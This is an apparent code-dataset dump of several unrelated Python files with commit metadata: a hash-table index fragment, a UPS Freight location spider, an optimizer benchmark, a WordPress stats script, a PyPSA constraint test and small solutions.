            map_data['h_limit'],
            map_data['bucket_size'],
            map_data['header_len'])
        # Seek to the bucket before reading it; previously the computed
        # position was never used and the read started from wherever the
        # file offset happened to be.
        map_data['fp'].seek(pos)
        raw_h_entry = map_data['fp'].read(map_data['bucket_size'])
        comps = struct.unpack(map_data['fmt'], raw_h_entry)
        ret = {}
        # An all-NUL first field marks an empty bucket.
        if comps[0] == '\0' * len(comps[0]):
            return None, map_data
        for ind in range(len(map_data['entry_map'])):
            ret[map_data['entry_map'][ind]] = comps[ind]
        ret['pos'] = pos
        return ret, map_data

    def hash_map_ref(self, key):
        '''
        Return the hash map reference data for the key as
        (entry_dict_or_None, map_data)
        '''
        hmdir = self._hm_dir(key)
        f_num = 1
        while True:
            fn_ = os.path.join(hmdir, 'midx_{0}'.format(f_num))
            # Arguments were previously passed as (fn_, key), swapped
            # relative to the _get_h_entry(key, fn_) signature.
            h_entry, map_data = self._get_h_entry(key, fn_)
            if not h_entry:
                # Empty bucket: this is a new key
                break
            if key == h_entry.get('key'):
                # The same key is already stored in this table: use it.
                # NOTE(review): assumes the stored field is named 'key'
                # in entry_map -- confirm once entry_map is defined.
                break
            # A different key hashed into the same bucket: collision, try
            # the next table file.
            f_num += 1
        return h_entry, map_data

    def insert(self, key, id_, start, size, type_, **kwargs):
        '''
        Insert the data into the specified location
        '''
        # 1. Get HT file data
        # 2. Get HT location
        # 3. Construct Index table data
        # 4. Write Index table data
        # 5. Construct hash table struct
        # 6. Write HT struct
        h_data, map_data = self.hash_map_ref(key)
        # NOTE(review): for a brand new key hash_map_ref returns
        # h_data=None, and the h_data[...] accesses below cannot work;
        # the new-key insertion path still needs to be implemented.
        i_entry = self._i_entry(
            key,
            id_,
            start,
            size,
            type_,
            h_data.get('prev', None) if h_data else None,
            **kwargs)
        # Append the index entry at the end of the file and remember where
        # it landed so the bucket can point at it.
        map_data['fp'].seek(0, 2)
        i_pos = map_data['fp'].tell()
        h_data['prev'] = i_pos
        map_data['fp'].write(i_entry)
        pack_args = []
        for ind in range(len(map_data['entry_map'])):
            pack_args.append(h_data[map_data['entry_map'][ind]])
        # Pack with the format stored in the header; this previously
        # looked up map_data[''] (an empty key) and could never work.
        h_entry = struct.pack(map_data['fmt'], *pack_args)
        map_data['fp'].seek(h_data['pos'])
        map_data['fp'].write(h_entry)
66d3d329674521c8756a8644f2f0a58824a1ec41 | add spider for ups freight | locations/spiders/ups_freight_service_centers.py | locations/spiders/ups_freight_service_centers.py | # -*- coding: utf-8 -*-
import re
import scrapy
from locations.items import GeojsonPointItem
class UPSFreightServiceCenter(scrapy.Spider):
download_delay = 0.2
name = "ups_freight_service_centers"
allowed_domains = ["upsfreight.com"]
start_urls = (
'https://www.upsfreight.com/ProductsandServices/ServiceCenterDir/default.aspx',
)
def parse_location(self, response):
ref = re.search(r'.+/(.+)', response.url).group(1)
properties = {
'addr_full': response.xpath('//span[contains(@id, "Address")]/text()').extract()[0],
'city': response.xpath('//span[contains(@id, "Zip")]/text()').extract()[0].split(',')[0],
'state': response.xpath('//span[contains(@id, "Zip")]/text()').extract()[0].split(', ')[1].split(' ')[0],
'postcode': response.xpath('//span[contains(@id, "Zip")]/text()').extract()[0].split(', ')[1].split(' ')[1],
'ref': ref,
'website': response.url,
'phone': response.xpath('//span[contains(@id, "Telephone")]/text()').extract()[0],
'name': response.xpath('//span[contains(@id, "lName")]/text()').extract()[0],
'country': ref.split('qcountry=')[1].split('&svc')[0]
}
yield GeojsonPointItem(**properties)
def parse_state(self, response):
location_urls = response.xpath('//*[@id="app_ctl00_scTable_hlDetail"]/@href').extract()
for url in location_urls:
yield scrapy.Request(response.urljoin(url), callback=self.parse_location)
def parse(self, response):
urls = response.xpath('//table//table//table//table//table//a/@href').extract()
for url in urls:
yield scrapy.Request(response.urljoin(url), callback=self.parse_state)
| Python | 0.000001 | |
9311d3d4acd8c67c20d76cc74d00e0f5a83318e6 | add product-of-array-except-self | vol5/product-of-array-except-self/product-of-array-except-self.py | vol5/product-of-array-except-self/product-of-array-except-self.py | class Solution(object):
def productExceptSelf(self, nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
n = len(nums)
ret = [1] * n
product = 1
for i in range(n):
ret[i] = product
product *= nums[i]
product = 1
for i in range(n - 1, -1, -1):
ret[i] *= product
product *= nums[i]
return ret | Python | 0.999376 | |
2c1e5286eca392854bf311e01d1131c45167973f | add coco benchmarking | benchmarks/coco.py | benchmarks/coco.py | """
This benchmark example uses the coco benchmark set of functions
(<http://coco.gforge.inria.fr/>, <https://github.com/numbbo/coco>)
to compare optimizers provided by fluentopt between themselves and also
with CMA-ES[1].
To run these benchmarks, the package 'cocoex' must be installed,
check <https://github.com/numbbo/coco> to see how to install it.
Also, the package 'cma' is needed and can be installed by pip.
For each function, each algorithm is ran for independent trials
and the results are all written in a csv file (by default benchmarks.csv).
each row correspond to a trial for a given algo and function.
The columns are:
- 'func' : function name (str)
- 'algo' : algo name (str)
- 'nbeval' : nb of evaluations performed (int)
- 'ybest' : the best output value found (float)
- 'duration' : duration in seconds (float)
[1] Nikolaus Hansen and Andreas Ostermeier, Completely derandomized
self-adaptation in evolution strategies.
Evolutionary computation, 9(2):159–195, 2001
"""
import time
import numpy as np
import pandas as pd
from cocoex import Suite, Observer
from fluentopt import Bandit
from fluentopt.bandit import ucb_minimize
from fluentopt.transformers import Wrapper
from fluentopt import RandomSearch
from cma import fmin as cma_fmin
from cma import CMAEvolutionStrategy
from clize import run
def cma(fun, budget):
    """Minimize *fun* with CMA-ES, starting from the center of its box."""
    span = fun.upper_bounds - fun.lower_bounds
    start_point = fun.lower_bounds + span / 2
    # Initial step size: 2% of the first coordinate's range; the per-axis
    # scaling option handles the remaining coordinates.
    initial_sigma = 0.02 * span[0]
    cma_options = {
        'scaling': span / span[0],
        'maxfevals': budget,
        'verb_log': 0,
        'verb_disp': 1,
        'verbose': 1,
    }
    strategy = CMAEvolutionStrategy(start_point, initial_sigma, cma_options)
    result = strategy.optimize(fun).result()
    # result starts with (xbest, ybest, nbeval, ...).
    return result[0], result[1], result[2]
def ucb(fun, budget):
    """Minimize *fun* with a UCB-scored bandit over a uniform box sampler."""
    box_sampler = _uniform_sampler(low=fun.lower_bounds, high=fun.upper_bounds)
    bandit = Bandit(sampler=box_sampler, score=ucb_minimize, nb_suggestions=100)
    return _run_opt(bandit, fun, budget)
def random_search(fun, budget):
    """Minimize *fun* by plain uniform random sampling of the search box."""
    box_sampler = _uniform_sampler(low=fun.lower_bounds, high=fun.upper_bounds)
    searcher = RandomSearch(sampler=box_sampler)
    return _run_opt(searcher, fun, budget)
def _uniform_sampler(low, high):
low = np.array(low)
high = np.array(high)
dim = len(low)
def sampler_(rng):
return rng.uniform(0, 1, size=dim) * (high - low) + low
return sampler_
def _run_opt(opt, feval, budget):
for _ in range(budget):
x = opt.suggest()
y = feval(x)
opt.update(x=x, y=y)
idx = np.argmin(opt.output_history_)
xbest = opt.input_history_[idx]
ybest = opt.output_history_[idx]
nbeval = budget
return xbest, ybest, nbeval
def main(nb_trials=15, budget_per_dim=100, output='benchmark.csv'):
    """Run every optimizer on every bbob function and dump results to CSV.

    Each CSV row is one independent trial, with columns 'func', 'algo',
    'nbeval', 'ybest' and 'duration' (seconds).
    """
    suite_instance = "year:2016"
    suite_name = "bbob"
    suite_options = ""
    suite = Suite(suite_name, suite_instance, suite_options)
    algos = [random_search, cma, ucb]
    stats = []
    # The previous enumerate() index was never used.
    for fun in suite:
        print('Function {}'.format(fun.name))
        for algo in algos:
            algo_name = algo.__name__
            print('Algo : "{}"'.format(algo_name))
            for trial in range(nb_trials):
                print('Running trial {}...'.format(trial + 1))
                t0 = time.time()
                # Budget scales with dimensionality; only ybest/nbeval are
                # recorded, so the best point itself is discarded.
                _xbest, ybest, nbeval = algo(fun, budget_per_dim * fun.dimension)
                delta_t = time.time() - t0
                stats.append({
                    'func': fun.id,
                    'algo': algo_name,
                    'nbeval': nbeval,
                    'ybest': ybest,
                    'duration': delta_t
                })
    stats = pd.DataFrame(stats)
    stats.to_csv(output, index=False)
# clize turns main's keyword arguments into command-line options.
if __name__ == '__main__':
    run(main)
| Python | 0.000001 | |
6ae6544cca07e857d680d199b2c2f436cb1d9a82 | add wordpress stats | wordpress_stats.py | wordpress_stats.py | from utils import *
import urllib, json
import time
import datetime
def dump(blogid,filepath):
posts = []
offset = 0
while True:
puts("offset",offset)
url = "https://public-api.wordpress.com/rest/v1/sites/" + blogid + "/posts?number=100&offset=" + str(offset)
response = urllib.urlopen(url);
data = json.loads(response.read())
for post in data['posts']:
posts.append(post)
if len(data['posts']) < 100:
break
offset += 100
output=open(filepath, 'w+')
content = "<wordpress nfollowers=\"" + "NA" + "\" timestamp=\"" + str(time.time()) + "\">\n"
for post in posts:
puts(post['title'],post['like_count'],post['date'])
content = content + "\t<post name=\"" + post['title'] + "\" \t timestamp=\"" + str(post['date']) + "\" \t fav_count=\"" + str(post['like_count']) + "\"></post>\n"
content = content + "</wordpress>\n"
output.write(content.encode('utf8'))
output.close()
# dump("wordpressexample.xml")
| Python | 0.000001 | |
3a5d29bbdbe60558d5f76e6311635bd340b21a57 | add test_lopf_constraints test | test/test_lopf_constraints.py | test/test_lopf_constraints.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 1 15:20:12 2022
@author: fabian
"""
import pytest
import pandas as pd
from pypsa.descriptors import (
expand_series,
get_switchable_as_dense as get_as_dense,
nominal_attrs,
)
# Maximum allowed constraint violation when checking the solved network.
TOLERANCE = 1e-2
def describe_storage_unit_contraints(n):
    """
    Checks whether all storage units are balanced over time. This function
    requires the network to contain the separate variables p_store and
    p_dispatch, since they cannot be reconstructed from p. The latter results
    from times tau where p_store(tau) > 0 **and** p_dispatch(tau) > 0, which
    is allowed (even though not economic). Therefore p_store is necessarily
    equal to negative entries of p, vice versa for p_dispatch.

    Returns a DataFrame of summary statistics (one column per check) or
    None when the network has no storage units.
    """
    sus = n.storage_units
    sus_i = sus.index
    if sus_i.empty:
        return
    sns = n.snapshots
    c = "StorageUnit"
    pnl = n.pnl(c)
    description = {}
    # Elapsed hours per snapshot, broadcast over the storage units.
    eh = expand_series(n.snapshot_weightings.stores, sus_i)
    # Standing losses compound over the elapsed hours of each snapshot.
    stand_eff = expand_series(1 - n.df(c).standing_loss, sns).T.pow(eh)
    dispatch_eff = expand_series(n.df(c).efficiency_dispatch, sns).T
    store_eff = expand_series(n.df(c).efficiency_store, sns).T
    inflow = get_as_dense(n, c, "inflow") * eh
    spill = eh[pnl.spill.columns] * pnl.spill
    # Spillage may never exceed the available inflow (min must be >= 0).
    description["Spillage Limit"] = pd.Series(
        {"min": (inflow[spill.columns] - spill).min().min()}
    )
    if "p_store" in pnl:
        soc = pnl.state_of_charge
        store = store_eff * eh * pnl.p_store  # .clip(upper=0)
        dispatch = 1 / dispatch_eff * eh * pnl.p_dispatch  # (lower=0)
        # Starting state: last snapshot's SOC for cyclic units, otherwise
        # the configured initial state of charge.
        start = soc.iloc[-1].where(
            sus.cyclic_state_of_charge, sus.state_of_charge_initial
        )
        previous_soc = stand_eff * soc.shift().fillna(start)
        # Re-derive the SOC from the energy balance; the residual against
        # the solver's SOC should be ~0 everywhere.
        reconstructed = (
            previous_soc.add(store, fill_value=0)
            .add(inflow, fill_value=0)
            .add(-dispatch, fill_value=0)
            .add(-spill, fill_value=0)
        )
        description["SOC Balance StorageUnit"] = (
            (reconstructed - soc).unstack().describe()
        )
    return pd.concat(description, axis=1, sort=False)
def describe_nodal_balance_constraint(n):
    """
    Helper function to double check whether network flow is balanced
    """
    # Collect branch flows at both ends, relabelled by the bus they attach
    # to, then sum per bus to get the net injection from the network.
    end_flows = []
    for end in (0, 1):
        for component in ("Line", "Transformer"):
            bus_map = n.df(component)[f"bus{end}"]
            end_flows.append(n.pnl(component)[f"p{end}"].rename(columns=bus_map))
    network_injection = pd.concat(end_flows, axis=1).groupby(level=0, axis=1).sum()
    imbalance = n.buses_t.p - network_injection
    return imbalance.unstack().describe().to_frame("Nodal Balance Constr.")
def describe_upper_dispatch_constraints(n):
    """
    Recalculates the minimum gap between operational status and nominal
    capacity; a negative minimum means an upper dispatch bound is violated.
    """
    columns = {}
    suffix = " Upper Limit"
    for component, nom_attr in nominal_attrs.items():
        # Branch components expose their dispatch as p0; everything else
        # uses the first letter of the nominal attribute (e.g. "p").
        if component in ["Line", "Transformer", "Link"]:
            dispatch_attr = "p0"
        else:
            dispatch_attr = nom_attr[0]
        upper_bound = n.df(component)[nom_attr + "_opt"] * get_as_dense(
            n, component, nom_attr[0] + "_max_pu"
        )
        headroom = upper_bound - n.pnl(component)[dispatch_attr]
        columns[component + suffix] = pd.Series({"min": headroom.min().min()})
    return pd.concat(columns, axis=1)
def describe_lower_dispatch_constraints(n):
    """
    Recalculates the minimum gap between dispatch and its lower capacity
    bound; a negative minimum means a lower bound is violated.

    Branch components (Line, Transformer, Link) are bounded below by
    -p_nom_opt * p_max_pu; other components by p_nom_opt * p_min_pu.
    """
    description = {}
    key = " Lower Limit"
    for c, attr in nominal_attrs.items():
        if c in ["Line", "Transformer", "Link"]:
            dispatch_attr = "p0"
            # Label with the same "<component> Lower Limit" scheme as the
            # other describe_* helpers; previously the branch columns were
            # labelled with just `c`, making the output inconsistent.
            description[c + key] = pd.Series(
                {
                    "min": (
                        n.df(c)[attr + "_opt"] * get_as_dense(n, c, attr[0] + "_max_pu")
                        + n.pnl(c)[dispatch_attr]
                    )
                    .min()
                    .min()
                }
            )
        else:
            dispatch_attr = attr[0]
            description[c + key] = pd.Series(
                {
                    "min": (
                        -n.df(c)[attr + "_opt"]
                        * get_as_dense(n, c, attr[0] + "_min_pu")
                        + n.pnl(c)[dispatch_attr]
                    )
                    .min()
                    .min()
                }
            )
    return pd.concat(description, axis=1)
def describe_store_contraints(n):
    """
    Checks whether all stores are balanced over time. Returns summary
    statistics of the energy-balance residual, or None without stores.
    """
    stores = n.stores
    if stores.index.empty:
        return
    snapshots = n.snapshots
    component = "Store"
    pnl = n.pnl(component)
    weights = expand_series(n.snapshot_weightings.stores, stores.index)
    # Standing losses compound over the elapsed hours of each snapshot.
    retention = expand_series(1 - n.df(component).standing_loss, snapshots).T.pow(weights)
    # First snapshot carries over either the last energy level (cyclic
    # stores) or the configured initial level.
    initial_e = pnl.e.iloc[-1].where(stores.e_cyclic, stores.e_initial)
    carried_e = retention * pnl.e.shift().fillna(initial_e)
    imbalance = carried_e - pnl.p - pnl.e
    return imbalance.unstack().describe().to_frame("SOC Balance Store")
def describe_cycle_constraints(n):
    """
    Check the cycle (Kirchhoff voltage law) constraints: impedance-weighted
    flows summed around every independent cycle should be ~0.
    """
    # AC lines are weighted by effective reactance, others by effective
    # resistance.
    weightings = n.lines.x_pu_eff.where(n.lines.carrier == "AC", n.lines.r_pu_eff)
    def cycle_flow(sub):
        # Cycle incidence matrix of the sub-network (lines x cycles).
        C = pd.DataFrame(sub.C.todense(), index=sub.lines_i())
        if C.empty:
            return None
        # The 1e5 factor rescales the tiny per-unit impedances; presumably
        # it matches the scaling used when formulating the constraints --
        # TODO confirm.
        C_weighted = 1e5 * C.mul(weightings[sub.lines_i()], axis=0)
        return C_weighted.apply(lambda ds: ds @ n.lines_t.p0[ds.index].T)
    return (
        pd.concat([cycle_flow(sub) for sub in n.sub_networks.obj], axis=0)
        .unstack()
        .describe()
        .to_frame("Cycle Constr.")
    )
# One-element tuple holding the list of check functions; test_tolerance
# unpacks it with *funcs when parametrizing. Commented entries are
# currently disabled checks.
funcs = (
    [
        describe_cycle_constraints,
        # describe_store_contraints,
        # describe_storage_unit_contraints,
        describe_nodal_balance_constraint,
        describe_lower_dispatch_constraints,
        describe_upper_dispatch_constraints,
    ],
)
@pytest.fixture(scope="module")
def solved_network(ac_dc_network):
    """Solve the shared AC/DC example network once per module."""
    n = ac_dc_network
    n.lopf(pyomo=False)
    # describe_cycle_constraints selects line weightings by carrier, so tag
    # every line with the carrier of its bus0.
    n.lines["carrier"] = n.lines.bus0.map(n.buses.carrier)
    return n
@pytest.mark.parametrize("func", *funcs)
def test_tolerance(solved_network, func):
    """Every constraint-violation summary must stay within TOLERANCE."""
    n = solved_network
    description = func(n).fillna(0)
    for col in description:
        assert abs(description[col]["min"]) < TOLERANCE
        # describe() puts its statistics in the index, not the columns;
        # the previous `"max" in description` tested column labels and
        # therefore never ran the max assertion.
        if "max" in description.index:
            assert description[col]["max"] < TOLERANCE
| Python | 0.001036 | |
e349a43ad33abf0e6cce2a410e0e6cb2342456f1 | No in Python | 2017-05-06/no.py | 2017-05-06/no.py | print('No!') | Python | 0.999311 | |
9cc09c6143025d88eedfa4f8eedcd23e2fe7990e | Create sahilprakash.py | Python/sahilprakash.py | Python/sahilprakash.py | print("Hello World!")
| Python | 0.000024 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.